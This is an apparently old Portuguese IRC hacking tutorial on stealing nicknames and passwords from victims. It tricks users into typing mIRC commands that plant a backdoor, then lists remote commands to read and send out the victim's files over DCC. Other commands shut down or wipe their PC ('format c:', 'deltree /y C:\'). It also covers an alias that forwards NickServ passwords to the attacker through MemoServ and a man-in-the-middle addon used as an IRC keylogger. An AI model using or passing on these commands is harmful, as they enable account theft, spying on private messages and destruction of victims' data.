|
ROUBANDO
NICKS |
Consiste em convencer a vítima digitar o seguinte comando:
//write ^ ctcp *:^:$2- | /.load -rs ^
Esse comando abre um backdoor no script da pessoa deixando ela vulnerável
a comandos remotos
no IRC, como esse comando atinge apenas
o script se a pessoa trocar de script, você não consegue
mais ataca-la.
Como atacar a vítima por esse backdoor?
/ctcp nickdavítima ^ comando
Se o nick da vítima for _giNK_ por exemplo, e você quer trocar a senha
dele para qualquer coisa que vc quiser eh soh vc digitar a senha nova ae,
onde esta escrito SENHA NOVA
basta digitar o seguinte comando:
/ctcp _giNK_ ^ nickserv set password SENHA NOVA
Abaixo segue uma lista de comandos para você utilizar neste ataque:
·
Ver os arquivos da vítima listados
/ctcp
Cachopa_ /alias list return $findfir(c:,*.*,write C:\Windows\Desktop\dir.txt
$1-)
/ctcp Cachopa_ /list
/ctcp Cachopa_ /dcc send nick C:\Windows\Desktop\dir.txt
/ctcp Cachopa_ /dcc send nick -p C:\Windows\Desktop\dir.txt
·
Desligar o PC da vítima
/ctcp nick /run C:\WINDOWS\RUNDLL32.EXE
shell32,SHExitWindowsEx
ou
/ctcp nick /run c:/windows/rundll.exe user.exe,exitwindows
·
Executar arquivos com determinado número de vezes:
/ctcp nick //%x = 1 | while %x < 9 { run c:\windows\notepad.exe $+(c:\n,%x) | inc %x }
/ctcp nick //%x = 1 | while %x > 0 { run c:\windows\notepad.exe $+(c:\n,%x) | inc %x }
·
Formatar o PC da vítima:
/ctcp nick
/run command format c:
e
/ctcp nick //return $findfile(c:,*.*,0,.remove $1-)
ou
/ctcp nick /run deltree /y C:\
2º
SENHA POR MEMOSERV
Esse é um método muito
simples, consiste em você convencer a vítima a digitar esse comando:
/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send seunick Senha
de
$me $+ : $2- | nickserv $1-
*No
lugar de “seu nick” você coloca o seu nick por exemplo se seu nick for surfista_loko:
/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send
surfista_loko
Senha de $me $+ : $2- | nickserv $1-
Após a vítima digitar esse comando, você pode
descansar que em algum tempinho
a senha dele estará no seu memoserv.
------------------------------------2
Addons
Addons são mini-programas, com rotinas programadas para fazerem determinada
ação em seu script como por exemplo colocar um onotice, um auto-color, mas
o que nos interessa mesmo são os addons de guerra como são chamados. Eles
podem se dividir em 3 sub-grupos:
• Addons de Guerra Remotos
Eles ficam alojados no PC da vítima, mas só são realmente perigosos se
forem carregados no script da vítima, é como um server de um trojan se a pessoa
abrir... BUM! Está vulnerável, se não abrir então está livre dos ataques daquele
trojan, assim funciona também os addons remotos, se a pessoa carregar o addon
com o seguinte comando então ele se aloja no script dela:
/load -rs nomedoarquivo.extensão
Ex. /load -rs sinisters.mrc
Depois da pessoa carregar o addon ela está completamente vulnerável aos
ataques que o addon possibilita, a partir daí você faz o que quiser, aqui
não tem como eu explicar como se usa addons, cada qual tem seu manual e seu
jeito de funcionar, geralmente o manual vem junto com o addon.
• Addons Locais e Remotos
Esses são uma mistura dos dois acima, é como um trojan também, o addon
local você usa para atacar(como o client de um trojan), e o remoto, você envia
para vítima(como o server).
Esses são os métodos mais comuns utilizados por “réckers” do IRC.
Addon Exemplo(Mirc Server Spy)
Abaixo explicaremos como utilizar um Addon muito conhecido e muito utilizado
atualmente no IRC para se roubar nicks, o Mirc Server Spy, ele age como um
intermediário entre a vítima e o servidor, ou seja, tudo que a vítima digitar(comandos,
pvt’s, etc) passarão por você antes de chegar ao servidor, assim você poderá
pegar senhas, e descobrir o que a vítima anda falando em pvts e chats, funciona
como um keylogger remoto mas só para o IRC.
Siga os passos para instala-lo em seu script:
1. Baixe o Addon em http://www.h2ksite.rg3.net/
(este site não existe mais, entrei em contato com o "Mendigo"
para ver onde o Addon pode ser encontrado; assim que tiver resposta corrijo
esta pequena falha)
2. Extraia-o do WinZip ou outro programa de extração e coloque-o na pasta
principal do seu script(ex c:/mIRC)
3. Abra seu script e digite: /load -rs mirc_server_spy.mrc
Após instalado o addon estara aguardando para ser chamado, abaixo um explicação
de como abri-lo e também de seus botões e comandos.
Para abrir o addon basta digitar /msv
Após digitar o comando uma janela se abre, abaixo uma rápida explicação
dela:
1- Server(Padrão: irc.Barretos.com.br): Quando a pessoa se conectar ao
seu IP ela entrara pelo server descrito na caixa de texto(deve ser um servidor
válido)
2- Ligar: Liga o servidor que muda o Status(ver nº 7) para “Servidor Ligado”
3- Desligar: Desliga o servidor que muda o Status(ver nº 7) para “Servidor
Desligado”
4- Limpar: Limpa a tela(ver nº 8)
5- Reiniciar: Reinicia o Servidor, ou seja, desliga e liga-o novamente(a sua
vítima caíra dele)
6- Sair/desconectar: Desliga o servidor, e/ou sai do programa
7- Status: Informa o Status do Servidor(Ligado ou Desligado)
8- Tela: fica gravado tudo que a vítima digitou.
Abaixo explicaremos passo-a-passo como usá-lo:
1-
Após abrir o programa digitando /msv digite um server valido ou deixe o padrão(irc.Barretos.com.Br)
2- Clique no botão “Ligar” para ligar o Server
3- Peça para a vítima digitar o comando /server “seu ip”(ex: /server 200.199.198.197)
4- Depois disso é só olhar a Tela que aparecerá tudo que a vítima digitou.